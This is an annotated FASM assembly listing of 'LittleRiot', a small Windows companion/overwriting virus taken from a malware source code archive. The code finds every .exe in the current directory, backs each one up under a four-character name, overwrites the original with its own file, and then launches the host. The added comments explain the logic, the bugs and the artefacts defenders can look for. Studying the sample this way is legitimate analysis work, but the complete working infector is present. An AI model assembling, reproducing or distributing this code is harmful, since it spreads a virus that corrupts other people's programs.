mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
include "%fasminc%\win32ax.inc"
; ---------------------------------------------------------------------------
; LittleRiot -- first routine in the file (presumably the program entry point;
; no explicit entry directive is visible here). 32-bit Windows code in FASM
; syntax; API calls go through the `invoke` macro pulled in by win32ax.inc.
;
; Analyst summary of what the visible code does:
;   1. Takes a file path from the process command line (the text between the
;      first pair of double quotes), i.e. its own image path when the command
;      line has the usual quoted form.
;   2. Enumerates "*.exe". The pattern has no directory part, so the search is
;      relative to the current working directory.
;   3. For every match: copies the match to the short name built by
;      GetHostName with bFailIfExists = 1, and only if that copy succeeded
;      overwrites the match with the file from step 1.
;   4. When enumeration ends, builds the short name from its own path and
;      starts that file with WinExec.
;
; Register / stack use: ebx is the working string pointer. The pointer to the
; own path is parked on the stack for the whole loop (push at HaveEndCmd,
; pop/push around the overwrite, final pop at ExecuteHost).
;
; Artefacts a defender can look for, all following from the calls below:
;   - one process issuing CopyFileA twice per .exe across a whole directory;
;   - new sibling files named after the four characters that precede ".exe";
;   - the affected .exe files all becoming copies of one and the same file
;     (identical size and hash);
;   - WinExec being called on one of those short-named siblings.
; ---------------------------------------------------------------------------
LittleRiot: invoke GetCommandLine
; eax = pointer to the command-line string. The inc skips its first byte
; without looking at it -- assumes that byte is an opening quote.
mov ebx, eax
inc ebx
; ecx counts the characters walked so the start can be recovered afterwards.
xor ecx, ecx
; Scan forward to the next '"'. There is no NUL or length check, so a command
; line without a second quote makes this loop read past the end of the string.
GetEndCmd: cmp byte [ebx], '"'
je HaveEndCmd
inc ebx
inc ecx
jmp GetEndCmd
; Overwrite the closing quote with NUL (the process command-line buffer is
; modified in place), then step ebx back to the first character of the path.
HaveEndCmd: mov byte [ebx], 0
sub ebx,ecx
; Keep the own-path pointer on the stack for the loop below.
push ebx
invoke FindFirstFile, ExeFiles, Win32FindData
mov dword [FindHandle], eax
; Loop test. On the first pass eax is the FindFirstFile result, on later passes
; the FindNextFile BOOL. FindFirstFile reports failure as INVALID_HANDLE_VALUE
; (-1), not 0, so a failed first search is not caught by this comparison.
FindMore: cmp eax, 0
je ExecuteHost
; Build HostName from the name of the file just found.
mov ebx, Win32FindData.cFileName
call GetHostName
; Copy the found file to HostName; last argument 1 = fail if HostName already
; exists. A zero return (copy failed, for whatever reason) skips the file, so
; an existing HostName file acts as an "already processed" marker.
invoke CopyFile, Win32FindData.cFileName, HostName, 1
cmp eax, 0
je FindNextVictim
; Fetch the own-path pointer and overwrite the found file with that file
; (last argument 0 = overwrite allowed). The return value is not checked.
pop ebx
invoke CopyFile, ebx, Win32FindData.cFileName, 0
; Put the pointer back so the stack is balanced on every path into the loop.
push ebx
FindNextVictim: invoke FindNextFile, dword [FindHandle], Win32FindData
jmp FindMore
; Enumeration finished: rebuild HostName from the own path and run that file.
; FindHandle is not closed anywhere in this listing.
ExecuteHost: pop ebx
call GetHostName
invoke WinExec, HostName, SW_SHOWNORMAL
; Plain return to whatever started this routine; no ExitProcess is imported.
ret
; ---------------------------------------------------------------------------
; GetHostName -- fill HostName from the tail of a NUL-terminated file name.
; In:    ebx = pointer to a NUL-terminated string
; Out:   first 5 bytes of HostName = the bytes found 8 to 4 positions before
;        the terminator; for a name ending in "abcd.exe" that is "abcd."
; Clobb: ebx, esi, edi, ecx, flags
;
; Analyst notes:
;   - Only 5 bytes are written and no terminator is stored. The routine relies
;     on the sixth byte of HostName already being zero -- presumably true for
;     a freshly loaded reserved buffer; verify.
;   - The result ends in '.'; Win32 path handling normally drops a trailing
;     dot, so the file on disk would carry the four-character name with no
;     extension -- confirm on a sample.
;   - Names that share the same last four characters before the extension map
;     to the same HostName.
;   - There is no length check: for a string shorter than 8 characters the
;     `sub ebx, 8` lands before the start of the string and the copy reads
;     whatever bytes precede it.
;   - rep movsb copies upward only if the direction flag is clear; nothing here
;     sets it, so that is assumed from the environment.
; ---------------------------------------------------------------------------
; Walk ebx to the terminating NUL.
GetHostName : cmp byte [ebx], 0
je RenameHostName
inc ebx
jmp GetHostName
; ebx is on the NUL: back up 8 bytes and copy 5 of them into HostName.
RenameHostName: sub ebx, 8
mov esi, ebx
mov edi, HostName
mov ecx, 5
rep movsb
ret
; Import table. KERNEL32.DLL is the only library referenced, and exactly five
; functions are resolved from it, each under a local alias that maps to the
; ANSI export named in quotes. For triage: a very small binary whose entire
; import list is command-line retrieval, file enumeration, file copy and
; WinExec matches the behaviour of the code in this listing. No FindClose or
; ExitProcess entry is imported.
data import
library kernel32, "KERNEL32.DLL"
import kernel32,\
GetCommandLine, "GetCommandLineA",\
FindFirstFile, "FindFirstFileA",\
FindNextFile, "FindNextFileA",\
CopyFile, "CopyFileA",\
WinExec, "WinExec"
end data
; Static data used by the routines in this listing.

; Search pattern handed to FindFirstFile. It has no directory component, so
; the enumeration is relative to the current working directory.
ExeFiles db "*.exe",0
; Return value of FindFirstFile, reused as the handle for FindNextFile.
FindHandle dd ?
; Find-data record filled by FindFirstFile / FindNextFile; only its cFileName
; member is read. The FINDDATA layout comes from the included headers.
Win32FindData FINDDATA
; 6 reserved bytes: GetHostName writes the first 5, and the sixth is never
; written, so it has to be zero already for HostName to be a valid
; NUL-terminated string (presumably zero-filled at load -- verify).
HostName rb 6